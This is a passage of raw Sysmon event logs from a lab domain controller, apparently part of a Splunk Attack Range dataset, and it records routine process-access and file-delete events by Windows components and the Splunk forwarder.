12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 23542300x80000000000000006558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.371{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9818ACFE98BE7263DA7C108FE10D8547,SHA256=4D8D9EC6D357351F2DE5DD4D5BB79AD80F03885F81B9075A20B329CECC32B3DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.371{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1792867CBC372E2CA257814D99F9445F,SHA256=23E089A3AD73F3F52E1BAD194D10B95EAABAF6F3ED7B4CEEDD862E1A1B90D6C9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.215{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.215{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+